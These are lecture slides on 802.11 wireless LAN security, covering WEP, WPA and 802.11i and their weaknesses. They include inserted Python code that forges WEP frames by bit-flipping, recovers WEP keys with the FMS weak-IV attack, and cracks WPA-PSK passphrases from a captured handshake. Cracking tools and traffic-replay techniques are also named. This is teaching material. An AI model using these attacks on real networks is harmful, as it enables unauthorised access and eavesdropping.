Wireless LAN Security, Network Security Lecture 8

Jan 15, 2016
Page 1: WLAN Security1 Wireless LAN Security Network Security Lecture 8.

WLAN Security 1

Wireless LAN Security

Network Security

Lecture 8

Page 2:

WLAN Security - Contents

> Wireless LAN 802.11
> Technology
> Security History
> Vulnerabilities
> Demonstration

Page 3:

Wireless LANs

> IEEE ratified 802.11 in 1997.
> Also known as Wi-Fi.
> Wireless LAN at 1 Mbps & 2 Mbps.
> WECA (Wireless Ethernet Compatibility Alliance) promoted interoperability.
  > Now the Wi-Fi Alliance.
> 802.11 focuses on Layer 1 & Layer 2 of the OSI model.
  > Physical layer
  > Data link layer

Page 4:

802.11 Components

> Two pieces of equipment defined:
> Wireless station
  > A desktop or laptop PC or PDA with a wireless NIC.
> Access point
  > A bridge between wireless and wired networks.
  > Composed of:
    > Radio
    > Wired network interface (usually 802.3)
    > Bridging software
  > Aggregates access for multiple wireless stations to the wired network.

Page 5:

802.11 modes

> Infrastructure mode
  > Basic Service Set
    > One access point.
  > Extended Service Set
    > Two or more BSSs forming a single subnet.
  > Most corporate LANs in this mode.
> Ad-hoc mode
  > Also called peer-to-peer.
  > Independent Basic Service Set
  > Set of 802.11 wireless stations that communicate directly without an access point.
  > Useful for quick & easy wireless networks.

Page 6:

Infrastructure mode

[Diagram: Basic Service Set (BSS) – single cell; Extended Service Set (ESS) – multiple cells; access points and stations.]

Page 7:

Ad-hoc mode

Independent Basic Service Set (IBSS)

Page 8:

802.11 Physical Layer

> Originally three alternative physical layers:
> Two incompatible spread-spectrum radio layers in the 2.4 GHz ISM band:
  > Frequency Hopping Spread Spectrum (FHSS)
    > 79 channels of 1 MHz
  > Direct Sequence Spread Spectrum (DSSS)
    > 14 channels (11 channels in US)
> One diffuse infrared layer.
> 802.11 speed: 1 Mbps or 2 Mbps.

Page 9:

802.11 Data Link Layer

> Layer 2 split into:
  > Logical Link Control (LLC).
  > Media Access Control (MAC).
> Same 802.2 LLC and 48-bit MAC addresses as 802.3.
> MAC - CSMA/CD not possible.
  > Can’t listen for a collision while transmitting.
> CSMA/CA – Collision Avoidance.
  > Sender waits for clear air, waits a random time, then sends data.
  > Receiver sends an explicit ACK when data arrives intact.
  > Also handles interference.
  > But adds overhead.
> 802.11 always slower than equivalent 802.3.

Page 10:

Hidden nodes

Page 11:

RTS / CTS

> To handle hidden nodes.
> Sending station sends “Request to Send”.
> Access point responds with “Clear to Send”.
> All other stations hear this and delay any transmissions.
> Only used for larger pieces of data.
  > When retransmission may waste significant time.

Page 12:

802.11b

> 802.11b ratified in 1999, adding 5.5 Mbps and 11 Mbps.
> DSSS as physical layer.
  > 11 channels (3 non-overlapping).
> Dynamic rate shifting.
  > Transparent to higher layers.
  > Ideally 11 Mbps.
  > Shifts down through 5.5 Mbps, 2 Mbps to 1 Mbps.
    > Higher ranges.
    > Interference.
  > Shifts back up when possible.
> Maximum specified range 100 metres.
> Average throughput of 4 Mbps.

Page 13:

Joining a BSS

> When an 802.11 client enters range of one or more APs:
  > APs send beacons.
  > AP beacon can include SSID.
  > AP chosen on signal strength and observed error rates.
> After AP accepts client:
  > Client tunes to AP channel.
> Periodically, all channels surveyed.
  > To check for stronger or more reliable APs.
  > If found, reassociates with new AP.

Page 14:

Access Point Roaming

[Diagram: roaming between access points on channels 1, 4, 7 and 9.]

Page 15:

Roaming and Channels

> Reassociation with APs:
  > Moving out of range.
  > High error rates.
  > High network traffic.
    > Allows load balancing.
> Each AP has a channel.
  > 14 partially overlapping channels.
  > Only three channels that have no overlap.
    > Best for multicell coverage.

Page 16:

802.11a

> 802.11a ratified in 1999 (products appeared in 2001).
> Supports up to 54 Mbps in the 5 GHz range.
> Higher frequency limits the range.
> Regulated frequency reduces interference from other devices.
> 12 non-overlapping channels.
> Usable range of 30 metres.
> Average throughput of 30 Mbps.
> Not backwards compatible.

Page 17:

802.11g

> 802.11g ratified in 2003.
> Supports up to 54 Mbps in the 2.4 GHz range.
> Backwards compatible with 802.11b.
> 3 non-overlapping channels.
> Range similar to 802.11b.
> Average throughput of 30 Mbps.
> 802.11n was due for November 2006 (it was finally ratified in 2009).
  > Aiming for a maximum of 200 Mbps with an average of 100 Mbps.

Page 18:

Open System Authentication

> Open System Authentication is in effect no authentication: the AP accepts any station that asks, and the SSID is a network name, not a secret.
> Service Set Identifier (SSID)
  > Station must specify SSID to Access Point when requesting association.
  > Multiple APs with same SSID form an Extended Service Set.
  > APs can broadcast their SSID.
  > Some clients allow * as SSID.
    > Associates with strongest AP regardless of SSID.

Page 19:

MAC ACLs and SSID hiding

> Access points have Access Control Lists (ACL).
  > ACL is a list of allowed MAC addresses.
  > E.g. allow access to:
    > 00:01:42:0E:12:1F
    > 00:01:42:F1:72:AE
    > 00:01:42:4F:E2:01
  > But MAC addresses are sniffable and spoofable.
> AP beacons without SSID.
  > Essid_jack:
    > Sends deauthenticate frames to a client.
    > The SSID is then revealed in the probe and association request frames the client sends to rejoin (they carry the SSID in clear).

Page 20:

Interception Range

[Diagram: station outside the building perimeter, within the 100 metre single-cell (BSS) range.]

Page 21:

Interception

> Wireless LAN uses a radio signal.
  > Not limited to the physical building.
> Signal is weakened by:
  > Walls
  > Floors
  > Interference
> A directional antenna allows interception over longer distances.

Page 22:

Directional Antenna

> Directional antenna provides focused reception.
> DIY plans available.
  > Aluminium cake tin
  > Chinese cooking sieve
  > http://www.saunalahti.fi/~elepal/antennie.html
  > http://www.usbwifi.orcon.net.nz/

Page 23:

WarDriving

> Software
  > Netstumbler
  > And many more
> Laptop
  > 802.11b, g or a PC card
> Optional:
  > Global Positioning System
  > Car, bicycle, boat…
> Logging of MAC address, network name (SSID), manufacturer, channel, signal strength, noise and (with GPS) location.

Page 24:

WarDriving results

> San Francisco, 2001
  > Maximum 55 miles per hour.
  > 1500 Access Points
  > 60% in default configuration.
  > Most connected to internal backbones.
  > 85% use Open System Authentication.
> Commercial directional antenna
  > 25 mile range from hilltops.
> Peter Shipley - http://www.dis.org/filez/openlans.pdf

Page 25:

WarDriving map Source: www.dis.org/wl/maps/

Page 26:

Worldwide War Drive 2004

> Fourth WWWD
> www.worldwidewardrive.org
> 228,537 Access points
  > 82,755 (35%) with default SSID
  > 140,890 (60%) with Open System Authentication
  > 62,859 (27%) with both, probably default configuration

Page 27:

Further issues

> Access Point configuration
  > Mixtures of SNMP, web, serial, telnet.
  > Default community strings, default passwords.
> Evil Twin Access Points
  > Stronger signal, capture user authentication.
> Renegade (rogue) Access Points
  > Unauthorised wireless LANs.

Page 28:

War Driving prosecutions

> February 2004, Texas: Stefan Puffer acquitted of wrongful access after showing an unprotected county WLAN to officials.
> June 2004, North Carolina, Lowe's DIY store:
  > Botbyl convicted for stealing credit card numbers via the unprotected WLAN.
  > Timmins convicted for checking email & web browsing via the unprotected WLAN.
> June 2004, Connecticut: Myron Tereshchuk guilty of drive-by extortion via unprotected WLANs.
  > “make the check payable to M.Tereshchuk”
> Sep 2004, Los Angeles: Nicholas Tombros guilty of drive-by spamming via unprotected WLANs.

Page 29:

802.11b Security Services

> Two security services provided:
  > Authentication
    > Shared Key Authentication
  > Encryption
    > Wired Equivalent Privacy (WEP)

Page 30:

Wired Equivalent Privacy

> Shared key between:
  > Stations.
  > An Access Point.
> Extended Service Set
  > All Access Points will have the same shared key.
> No key management.
  > Shared key entered manually into:
    > Stations
    > Access points
  > Key management nightmare in large wireless LANs.

Page 31:

RC4

> Ron’s Code number 4 (Rivest Cipher 4)
> Symmetric key stream cipher
> RSA Security Inc.
> Designed in 1987.
> Trade secret until leaked in 1994.
> RC4 can use key sizes from 1 to 256 bytes (8 to 2048 bits).
> RC4 generates a stream of pseudo-random bytes.
  > XORed with plaintext to create ciphertext.

Page 32:

WEP – Sending

> Compute Integrity Check Value (ICV).
  > Provides integrity against accidental corruption only: CRC-32 is linear, not a keyed MAC.
  > 32 bit Cyclic Redundancy Check.
  > Appended to message to create plaintext.
> Plaintext encrypted via RC4.
  > Provides confidentiality.
  > Plaintext XORed with long key stream of pseudo-random bits.
  > Key stream is a function of:
    > 40-bit secret key
    > 24 bit initialisation vector
> Ciphertext is transmitted, with the IV sent in clear ahead of it.

Page 33:

WEP Encryption

[Diagram: secret key || initialisation vector (IV) seeds the RC4 PRNG; plaintext || 32 bit CRC is XORed with the key stream; IV || ciphertext is transmitted.]

Page 34:

WEP – Receiving

> Ciphertext is received.
> Ciphertext decrypted via RC4.
  > Ciphertext XORed with long key stream of pseudo-random bits.
  > Key stream is a function of:
    > 40-bit secret key
    > 24 bit initialisation vector (IV), taken from the received frame
> Check ICV
  > Separate ICV from message.
  > Compute ICV for message.
  > Compare with received ICV.

Page 35:

Shared Key Authentication

> When a station requests association with an Access Point:
  > AP sends a random challenge to the station.
  > Station encrypts the challenge.
    > Uses RC4, 40 bit shared secret key & 24 bit IV.
  > Encrypted challenge sent to AP.
  > AP decrypts the received message.
    > Uses RC4, 40 bit shared secret key & 24 bit IV.
  > AP compares the decrypted value to the challenge it transmitted.
  > If they match, the station has the shared secret key.
> Weakness: both the challenge and its encrypted form are sent in clear, so an eavesdropper learns challenge XOR response = the key stream for that IV, and can answer a later challenge correctly without ever knowing the key.

Page 36:

WEP Safeguards

> Shared secret key required for:
  > Associating with an access point.
  > Sending data.
  > Receiving data.
> Messages are encrypted.
  > Confidentiality.
> Messages have a checksum.
  > Integrity.
> But management traffic is still broadcast in clear, containing the SSID.

Page 37:

Initialisation Vector

> IV must be different for every message transmitted.
> 802.11 standard doesn’t specify how the IV is calculated.
> Wireless cards use several methods:
  > Some use a simple ascending counter for each message.
  > Some switch between alternate ascending and descending counters.
  > Some use a pseudo-random IV generator.
> Whatever the method, a 24 bit IV repeats after at most 2^24 frames; a random IV is expected to repeat within about 5,000 frames (birthday bound).

Page 38:

Passive WEP attack

> If the 24 bit IV is an ascending counter,
  > and the Access Point transmits at 11 Mbps,
  > all IVs are exhausted in roughly 5 hours.
> Passive attack:
  > Attacker collects all traffic.
  > Attacker collects two messages encrypted with the same key and the same IV (i.e. the same key stream).
  > Statistical attacks on C1 XOR C2 = P1 XOR P2 reveal the plaintexts.
  > Plaintext XOR Ciphertext = Key stream, which then decrypts every other frame sent under that IV.

Page 39:

Active WEP attack

> If the attacker knows a plaintext and ciphertext pair:
  > Key stream is known.
  > Attacker can create correctly encrypted messages.
  > Access Point is deceived into accepting the messages.
> Bit flipping
  > Flip a bit in the ciphertext.
  > The resulting bit difference in the CRC-32 can be computed (CRC-32 is linear), so the encrypted ICV can be patched to match without knowing the key.

Page 40:

Limited WEP keys

> Some vendors allow limited WEP keys:
  > User types in a passphrase.
  > WEP key is generated from the passphrase.
  > The passphrase creates only 21 bits of entropy in the 40 bit key.
  > Reduces key strength to 21 bits = 2,097,152 keys.
  > Remaining 19 bits are predictable.
  > A 21 bit key can be brute forced in minutes.
> www.lava.net/~newsham/wlan/WEP_password_cracker.ppt

Page 41:

Creating limited WEP keys

Page 42:

Brute force key attack

> Capture ciphertext.
  > IV is included in the message.
> Search all 2^40 possible secret keys.
  > 1,099,511,627,776 keys
  > ~170 days on a modern laptop (at the time of these slides)
> Find which key decrypts the ciphertext to plaintext.

Page 43:

128 bit WEP

> Vendors have extended WEP to 128 bit keys.
  > 104 bit secret key.
  > 24 bit IV.
> Brute force takes ~10^19 years for a 104-bit key.
> Effectively safeguards against brute force attacks.
  > But not against the key-scheduling and IV attacks that follow, whose cost grows only linearly with key length.

Page 44:

Key Scheduling Weakness

> Paper from Fluhrer, Mantin, Shamir, 2001.
> Two weaknesses:
  > Invariance weakness.
    > Certain keys leak into the key stream.
  > IV weakness.
    > If a portion of the PRNG input is exposed, analysis of the initial key stream allows the key to be determined.

Page 45:

IV weakness

> WEP exposes part of the PRNG input.
  > IV is transmitted with the message.
> Every wireless frame has a reliable first byte.
  > Sub-network Access Protocol (SNAP) header used in the logical link control layer, upper sub-layer of the data link layer.
  > First byte is 0xAA.
> Attack is:
  > Capture packets with weak IVs.
  > First byte of ciphertext XOR 0xAA = first byte of key stream.
  > Can determine the key from the initial key stream, one key byte at a time.
> Practical for 40 bit and 104 bit keys.
> Passive attack.
  > Non-intrusive.
  > No warning.
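The two WEP failures just described, the CRC-32 bit-flipping forgery from the "Active WEP attack" slide and the FMS first-byte key recovery from this slide, as one added Python example. This is not code from the lecture or from Wepcrack, Airsnort or aircrack; it assumes a 40-bit key, frames whose plaintext starts with the SNAP byte 0xAA, and a constructed capture of frames carrying weak IVs of the form (A, 255, X). The key, frames and IVs are made up for the demo, and the `check` oracle used to confirm a recovered key is the same known-plaintext test the brute-force slide relies on.

```python
"""WEP = RC4(IV || key) XOR (plaintext || CRC-32): forgery and key recovery.
Added example, not lecture code; the key, frames and IVs below are constructed."""
import zlib
from collections import Counter


def rc4(key, n):
    """RC4 key scheduling (KSA) followed by n output bytes (PRGA)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP integrity check value: plain CRC-32 (little-endian on the wire)."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key, iv, plaintext):
    """Frame body = IV || (RC4(IV || key) XOR (plaintext || ICV))."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key, frame):
    """Returns the plaintext if the ICV verifies, otherwise None."""
    iv, body = frame[:3], frame[3:]
    pt = xor(body, rc4(iv + key, len(body)))
    return pt[:-4] if icv(pt[:-4]) == pt[-4:] else None


def bitflip(frame, delta):
    """Apply XOR-difference `delta` to the plaintext without the key. CRC-32 is
    affine over GF(2): crc(p ^ d) = crc(p) ^ crc(d) ^ crc(zeros), so the encrypted
    ICV is patched with the same XOR trick and the receiver's check still passes."""
    patch = delta + xor(icv(delta), icv(bytes(len(delta))))
    return frame[:3] + xor(frame[3:], patch)


def fms_votes(prefix, captures):
    """FMS vote for key byte len(prefix) from (iv, first key stream byte) pairs.
    Run the A = 3 + len(prefix) KSA steps whose key bytes are known. If the IV is
    'resolved' (S[1] < A and S[1] + S[S[1]] == A) the first output byte z equals
    S[j + S[A] + K[A]] with probability ~5%, so K[A] = S^-1[z] - j - S[A]."""
    A = 3 + len(prefix)
    votes = Counter()
    for iv, z in captures:
        k = iv + prefix
        S, j = list(range(256)), 0
        for i in range(A):
            j = (j + S[i] + k[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        if S[1] < A and (S[1] + S[S[1]]) & 0xFF == A:
            votes[(S.index(z) - j - S[A]) & 0xFF] += 1
    return votes


def fms_recover(captures, keylen, check, prefix=b"", width=5):
    """Depth-first search over the top `width` candidates per byte; `check(key)`
    is the known-plaintext oracle: does this key verify a captured frame's ICV?"""
    if len(prefix) == keylen:
        return prefix if check(prefix) else None
    for cand, _ in fms_votes(prefix, captures).most_common(width):
        key = fms_recover(captures, keylen, check, prefix + bytes([cand]), width)
        if key is not None:
            return key
    return None


# Constructed demo data: a 40-bit key and the LLC/SNAP + IPv4 EtherType prefix.
SECRET = bytes.fromhex("0badc0ffee")
SNAP = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00])


def demo_bitflip():
    """Turn AMOUNT=0001 into AMOUNT=9999 inside an encrypted frame, without the key."""
    original, wanted = SNAP + b"AMOUNT=0001", SNAP + b"AMOUNT=9999"
    frame = wep_encrypt(SECRET, b"\x00\x00\x01", original)
    return wep_decrypt(SECRET, bitflip(frame, xor(original, wanted)))


def demo_fms():
    """Sniff 256 frames per key byte with weak IVs (A, 255, X), then recover the key."""
    captures, sample = [], None
    for A in range(3, 3 + len(SECRET)):
        for X in range(256):
            iv = bytes([A, 255, X])
            frame = wep_encrypt(SECRET, iv, SNAP + b"payload")
            sample = sample or frame
            captures.append((iv, frame[3] ^ 0xAA))  # ciphertext[0] XOR known SNAP byte
    return fms_recover(captures, len(SECRET), lambda k: wep_decrypt(k, sample) is not None)


if __name__ == "__main__":
    print(demo_bitflip())
    print(demo_fms().hex())
```

Each resolved IV names the right key byte only about one time in twenty, so the attack is a vote count, and the depth-first search with a verification oracle is what turns a noisy vote into a certain answer; the same structure, with far more IV classes, is what aircrack-style tools implement. Note that nothing in `bitflip` or `fms_recover` ever touches `SECRET`.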

Page 46:

Wepcrack

> First tool to demonstrate the attack using the IV weakness.
> Open source, Anton Rager.
> Three components:
  > Weak IV generator.
  > Search sniffer output for weak IVs & record the 1st byte.
  > Cracker to combine weak IVs and selected 1st bytes.
> Cumbersome.

Page 47:

Airsnort

> Automated tool.
> Cypher42, Minnesota, USA.
> Does it all!
  > Sniffs.
  > Searches for weak IVs.
  > Records encrypted data.
  > Until the key is derived.
> 100 MB to 1 GB of transmitted data.
> 3 to 4 hours on a very busy WLAN.

Page 48:

Avoid the weak IVs

> FMS described a simple method to find weak IVs.
> Many manufacturers avoid those IVs after 2002.
> Therefore Airsnort and others may not work on recent hardware.
> However David Hulton aka h1kari:
  > Properly implemented FMS attack which shows many more weak IVs.
  > Identified IVs that leak into the second byte of the key stream.
    > Second byte of the SNAP header is also 0xAA.
  > So the attack still works on recent hardware.
  > And is faster on older hardware.
  > Dwepcrack, weplab, aircrack.

Page 49:

Generating WEP traffic

> Not capturing enough traffic?
> Capture encrypted ARP request packets.
  > Anecdotally, lengths of 68, 118 and 368 bytes appear appropriate.
> Replay the encrypted ARP packets to generate encrypted ARP replies, each carrying a fresh IV.
  > WEP has no replay protection, so the AP accepts the replayed frames.
> Aireplay implements this.

Page 50:

802.11 safeguards

> Security Policy & Architecture Design
> Treat as untrusted LAN
> Discover unauthorised use
> Access point audits
> Station protection
> Access point location
> Antenna design

Page 51:

Security Policy & Architecture

> Define use of the wireless network:
  > What is allowed.
  > What is not allowed.
> Holistic architecture and implementation:
  > Consider all threats.
  > Design the entire architecture to minimise risk.

Page 52:

Wireless as untrusted LAN

> Treat wireless as untrusted.
  > Similar to the Internet.
> Firewall between WLAN and backbone.
> Extra authentication required.
> Intrusion Detection at the WLAN / backbone junction.
> Vulnerability assessments.

Page 53:

Discover unauthorised use

> Search for unauthorised access points, ad-hoc networks or clients.
> Port scanning
  > For unknown SNMP agents.
  > For unknown web or telnet interfaces.
> Warwalking!
  > Sniff 802.11 packets.
  > Identify IP addresses.
  > Detect signal strength.
  > But may sniff your neighbours…
> Wireless Intrusion Detection
  > AirMagnet, AirDefense, Trapeze, Aruba,…

Page 54:

Access point audits

> Review security of access points.
  > Are passwords and community strings secure?
> Use firewalls & router ACLs.
  > Limit use of access point administration interfaces.
> Standard access point config:
  > SSID
  > WEP keys
  > Community string & password policy

Page 55:

Station protection

> Personal firewalls
  > Protect the station from attackers.
> VPN from station into Intranet
  > End-to-end encryption into the trusted network.
  > But consider roaming issues.
> Host intrusion detection
  > Provide early warning of intrusions onto a station.
> Configuration scanning
  > Check that stations are securely configured.

Page 56:

Location of Access Points

> Ideally locate access points in the centre of buildings.
> Try to avoid access points:
  > By windows
  > On external walls
  > With line of sight to outside
> Use a directional antenna to “point” the radio signal.

Page 57:

WPA

> Wi-Fi Protected Access
> Works with 802.11b, a and g.
> “Fixes” WEP’s problems.
  > Existing hardware can be used (firmware/driver update).
  > 802.1x user-level authentication.
  > TKIP
    > RC4 session-based dynamic encryption keys.
    > Per-packet key derivation.
    > Unicast and broadcast key management.
    > New 48 bit IV with a new sequencing method (gives replay protection).
    > Michael 8 byte message integrity code (MIC).
  > Optional AES support to replace RC4.

Page 58:

WPA and 802.1x

> 802.1x is a general purpose network access control mechanism.
> WPA has two modes:
  > Pre-shared mode, uses pre-shared keys.
  > Enterprise mode, uses Extensible Authentication Protocol (EAP) with a RADIUS server making the authentication decision.
> EAP is a transport for authentication, not authentication itself.
> EAP allows arbitrary authentication methods.
  > For example, Windows supports:
    > EAP-TLS requiring client and server certificates.
    > PEAP-MS-CHAPv2.

Page 59:

Practical WPA attacks

> Dictionary attack on pre-shared key mode.
  > CoWPAtty, Joshua Wright.
  > The PSK is derived from the passphrase and SSID, and the 4-way handshake can be captured passively, so the attack runs offline and is limited only by passphrase strength.
> Denial of service attack
  > If WPA equipment sees two packets with invalid MICs within 60 seconds (Michael countermeasures):
    > All clients are disassociated.
    > All activity stopped for one minute.
  > Two malicious packets a minute are enough to stop a wireless network.
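The pre-shared-key dictionary attack above, as an added Python example (not CoWPAtty's code or anything from the lecture). It derives the PMK, PTK and EAPOL-Key MIC exactly as 802.11i specifies, so a candidate passphrase can be checked against a captured handshake offline; the SSID, passphrase, MAC addresses, nonces, wordlist and EAPOL frame are constructed for the demo (the MAC addresses are the two from the ACL slide).

```python
"""WPA/WPA2-PSK offline dictionary attack against a captured 4-way handshake.
Added example; SSID, passphrase, MACs, nonces, wordlist and EAPOL frame are constructed."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """802.11i PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are the only thing that slows a dictionary attack down."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from 802.11i. Everything except the PMK is visible in the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(ptk, eapol_frame, version=2):
    """MIC over the EAPOL-Key frame (MIC field zeroed) with KCK = PTK[0:16].
    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1-128."""
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(ptk[:16], eapol_frame, digest).digest()[:16]


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, mic, version=2):
    """Try each candidate; the first whose derived KCK reproduces the captured MIC is
    the passphrase. Returns None if the passphrase is not in the list."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        ptk = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk, eapol_frame, version), mic):
            return candidate
    return None


# --- Constructed "capture": what a sniffer sees of a WPA2-PSK 4-way handshake ---
SSID = "CorpWLAN"
AP_MAC = bytes.fromhex("0001420e121f")
STA_MAC = bytes.fromhex("000142f172ae")
ANONCE = hashlib.sha256(b"constructed anonce").digest()   # message 1
SNONCE = hashlib.sha256(b"constructed snonce").digest()   # message 2
# EAPOL-Key message 2 with its 16-byte MIC field zeroed (constructed, abbreviated layout).
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(8) + SNONCE + bytes(16 + 8 + 8) + bytes(16) + b"\x00\x00"
TRUE_PASSPHRASE = "sunflower42"   # constructed: what the victim AP is configured with
CAPTURED_MIC = eapol_mic(ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID),
                                      AP_MAC, STA_MAC, ANONCE, SNONCE), EAPOL_MSG2)
WORDLIST = ["password", "letmein", "CorpWLAN", "sunflower42", "hunter2"]


def demo():
    """Recover the passphrase from the captured handshake and a small wordlist."""
    return crack_psk(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, CAPTURED_MIC)


if __name__ == "__main__":
    print(demo())
```

Because the PBKDF2 salt is the SSID, the expensive PMK step can be precomputed once per SSID and reused against every network with that name, which is why default SSIDs make this attack cheaper; the handshake-specific PTK and MIC steps are a handful of HMACs per guess.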

Page 60:

802.11i

> Robust Security Network extends WPA.
> Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP).
  > Based on a mode of AES (CCM), with 128 bit keys and a 48 bit packet number used as the nonce.
> Also adds dynamic negotiation of authentication and encryption algorithms.
  > Allows for future change.
> Does require new hardware.
> www.drizzle.com/~aboba/IEEE/

Page 61:

Relevant RFCs

> RADIUS Extensions: RFC 2869
> EAP: RFC 2284 (since superseded by RFC 3748)
> EAP-TLS: RFC 2716 (since superseded by RFC 5216)

Page 62:

Demonstration

> War driving
> Packet sniffing
> Faking APs
> Cracking WEP
  > Brute force
  > Dictionary attack
  > FMS / h1kari attack
> Airsnarf?
> Packet injection?